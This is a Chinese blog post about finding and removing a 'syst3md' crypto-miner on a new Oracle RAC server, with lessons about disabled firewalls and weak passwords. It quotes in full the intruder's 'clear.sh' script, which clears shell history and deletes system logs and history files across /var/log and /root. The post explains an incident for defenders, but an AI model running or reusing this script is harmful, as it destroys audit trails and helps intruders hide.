遭遇syst3md挖矿病毒(1)
一套刚刚装好19C RAC,发现grid用户起了一个奇怪的进程,且CPU占用很高,将近800%,如下图:
查看这个程序发现写了好几行命令:
查询了一些资料,发现和其他文章描述极其相似,具体不太懂,也不想研究这东西了。那就开始清除吧,考虑到主要干2件事,一是杀进程,二是修改密码,这下黑客的“肉鸡账本”又少了2台白嫖,哈哈哈~
在syst3md的主进程(exe)中有个软连接指向了/tmp目录下的syst3md,其中黑客在tmp目录下创建了...作为隐藏目录,包装了一层目录,真是煞费苦心了~
在使用kill命令后,syst3md 进程又启动了,果然还是有些顽固的,不过咱也不是这么还糊弄的。马上查看grid用户,发现了计划任务:
删除掉,并且将/tmp/.../* 统统删除。
发现挖矿程序目录中有一个叫“clear.sh”脚本,大家来鉴赏一些,黑客是如何清除自己的脚印的吧:
#! /bin/bash
########## Pentru a rula script-ul trebuie sa folosesti doar ". clear.sh" ##########
history -c
history -rc
clear ; unset ; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log
/maillog /root/.bash_history ; unset HISTFILE ; unset HISTSAVE ; unset HISTLOG ; history -n ; unset WATCH ; export HISTFILE=/de
v/null ; export HISTFILE=/dev/null
rm -rf /var/log/lastlog
rm -rf $HOME/.bash_history
rm -rf /var/log/messages
rm -rf /var/log/warn
rm -rf /var/log/wtmp
rm -rf /var/log/poplog
rm -rf /var/log/qmail
rm -rf /var/log/smtpd
rm -rf /var/log/telnetd
rm -rf /var/log/secure
rm -rf /var/log/auth
rm -rf /var/log/auth.log
rm -rf /var/log/cups/access_log
rm -rf /var/log/cups/error_log
rm -rf /var/log/thttpd_log
rm -rf /var/log/spooler
rm -rf /var/spool/tmp
rm -rf /var/spool/errors
rm -rf /var/spool/locks
rm -rf /var/log/nctfpd.errs
rm -rf /var/log/acct
rm -rf /var/apache/log
rm -rf /var/apache/logs
rm -rf /usr/local/apache/log
rm -rf /usr/local/apache/logs
rm -rf /usr/local/www/logs/thttpd_log
rm -rf /var/log/news
rm -rf /var/log/news/news
rm -rf /var/log/news.all
rm -rf /var/log/news/news.all
rm -rf /var/log/news/news.crit
rm -rf /var/log/news/news.err
rm -rf /var/log/news/news.notice
rm -rf /var/log/news/suck.err
rm -rf /var/log/news/suck.notice
rm -rf /var/log/xferlog
rm -rf /var/log/proftpd/xferlog.legacy
rm -rf /var/log/proftpd.xferlog
rm -rf /var/log/proftpd.access_log
rm -rf /var/log/httpd/error_log
rm -rf /var/log/httpsd/ssl_log
rm -rf /var/log/httpsd/ssl.access_log
rm -rf /var/adm
rm -rf /var/run/utmp
rm -rf /etc/wtmp
rm -rf /etc/utmp
rm -rf /etc/mail/access
rm -rf /var/log/mail/info.log
rm -rf /var/log/mail/errors.log
rm -rf /var/log/httpd/*_log
rm -rf /var/log/ncftpd/misclog.txt
rm -rf /var/account/pacct
rm -rf /var/log/snort
rm -rf /var/log/bandwidth
rm -rf /var/log/explanations
rm -rf /var/log/syslog
rm -rf /var/log/user.log
rm -rf /var/log/daemons/info.log
rm -rf /var/log/daemons/warnings.log
rm -rf /var/log/daemons/errors.log
rm -rf /etc/httpd/logs/error_log
rm -rf /etc/httpd/logs/*_log
rm -rf /var/log/mysqld/mysqld.log
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.sh_history
rm -rf /root/.history
rm -rf /root/*_history
rm -rf /root/.login
rm -rf /root/.logout
rm -rf /root/.bash_logut
rm -rf /root/.Xauthority
set +o history;history -rc;unset HISTFILE;unset HISTSIZE;unset $HISTFILE;unset $HISTSIZE;rm -rf $HISTFILE;rm -rf ~/.ksh_history
;rm -rf ~/.bash_history;rm -rf ~/.bash_logout;rm -rf /root/.ksh_history;rm -rf /root/.bash_history;rm -rf /root/.bash_logout;rm-rf /var/log/faillog;rm -rf /var/log/lastlog;rm -rf /var/log/mail;rm -rf /var/log/maillog;rm -rf /var/log/messages;rm -rf /var
/log/secure;rm -rf /var/log/syslog;rm -rf /var/log/wtmp;rm -rf /var/log/xferlog;rm -rf /var/run/utmp;touch ~/.ksh_history;touch~/.bash_history;touch ~/.bash_logout;touch /root/.ksh_history;touch /root/.bash_history;touch /root/.bash_logout;touch /var/lo
g/faillog;touch /var/log/lastlog;touch /var/log/mail;touch /var/log/maillog;touch /var/log/messages;touch /var/log/secure;touch/var/log/syslog;touch /var/log/wtmp;touch /var/log/xferlog;touch /var/run/utmp;history -rc;unset HISTFILE HISTSAVE HISTMOVE HI
STZONE HISTORY HISTLOG USERHOST;unset HISTFILE HISTSAVE HISTLOG SCREEN WATCH
rm -rf /root/.bash_history
rm -rf $HOME/.bash_history
rm -rf /var/log/*
set +o history
history -c
history -rc
printf "\e[92mAm terminat - clear log by ez \e[0m\n"
教训:
由于安装时关闭了防火墙,这种暴露在外网的环境变得非常脆弱,再加上部署时一时疏忽,把集群用户的密码弱化了,这就带来了风险和隐患。这次庆幸的是,黑客没有大肆破坏环境或者勒索,只是白嫖操作系统资源。
遭遇syst3md挖矿病毒(1)相关推荐
- syst3md 挖矿病毒处理记录
这两天发现服务器上部署的应用系统 体验较差,访问响应慢 不太对劲.部分接口响应达到了 4秒.正好空闲上服务器上检查一下性能. [root@localhost ~]# mpstat -P ALL 10 ...
- 关于linux遭受挖矿病毒,伪装为trace
前几天两台线上的centos7遭遇了挖矿病毒 每天的cpu都是跑满的状态 进程名为:trace 实际文件名为:xmrig 捋一下处理流程: 看看一下进程号.然后 ls -l /proc/进程号 ...
- 某云服务器挖矿病毒查杀日记
接手的某项目部署于某云平台centos服务器上,由tomcat作为中间件提供应用,且购买了该平台的域名服务,从2019年底上线运营,一直运行比较平稳,可能还没正式用起来,用的人也不是很多吧.但凡事总有 ...
- Linux被kdevtmpfsi,pnscan挖矿病毒入侵记录
Linux被kdevtmpfsi,pnscan挖矿病毒入侵 记录起因 从腾讯云刚拿了一台新服务器,第一天装好docker环境后,第二天上午就收到了来自腾讯云的短信警告.登陆平台后发现站内信 好在腾讯没 ...
- dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程
dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程 现象描述 今天通过密钥以普通用户tung的身份登录远程Cent OS服务器时,连接出现非常严重的卡顿,进入后发现CPU被名为dbus ...
- jenkins漏洞导致服务器中了挖矿病毒!cpu飙高351%!看我如何消灭它!
作者:SilentBillows,资深Java工程师,架构师小秘圈特约作者!欢迎大家投稿,在后台回复投稿即可! 一, 定位问题 1.发现cpu异常,查看对应的进程信息 [root@versionlib ...
- Linux——挖矿病毒(sysupdate, networkservice进程)清除解决方案
问题描述 Linux进程 阿里云管理控制台看看CPU占用率 解决方案 top命令 获取进程号 查看进程运行的文件位置 ls 命令 ls -l proc/{进程号}/exe sysupdate.netw ...
- 阿里云服务器被挖矿病毒minerd***的解决方法
早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,minerd之 ...
- 亚信安全发布2021年挖矿病毒专题报告,聚焦挖矿病毒进化与治理
供稿 | 亚信安全 出品 | CSDN云计算 近日,<亚信安全2021年挖矿病毒专题报告>正式发布(以下简称<报告>).<报告>以2021年亚信安全威胁情报与服务运 ...
最新文章
- YEX黄建:脱离比特币谈区块链,要么真傻,要么装疯卖傻丨区块链十人谈
- 根据某一列的进行去重的小工具----duplicated.exe
- 【撸码师登云梯】google
- Java基础教程(3)--回顾HelloWorld
- 什么是简单的分析SQL注入漏洞
- 9月20日 DNS总结
- spring boot之security
- 心跳监测器 IHeartBeatChecker
- Docker 方式搭建 Prometheus + grafana
- Spring生态系统(Spring可能大家都在用,很少去关注整体架构)
- OpenCV-特征提取与检测(02、Shi-Tomasi角点检测)
- 1到20的阶乘和是多少 php,20的阶乘(1到20的阶乘和结果)
- 使用VGG16网络结构训练自己的图像分类模型
- 计算机软件的输出设备有哪些,计算机输出设备有哪些
- PMP第八节:项目质量管理
- 计算机网络的产生与发展
- 使用cloudcompare使xy轴的值反过来
- java年利率_在java中怎么算一年的利息,假如年利率是2.25%
- 法拉第效应维尔德常数_什么是法拉第效应?
- 计算机毕业设计ssm网上书店商城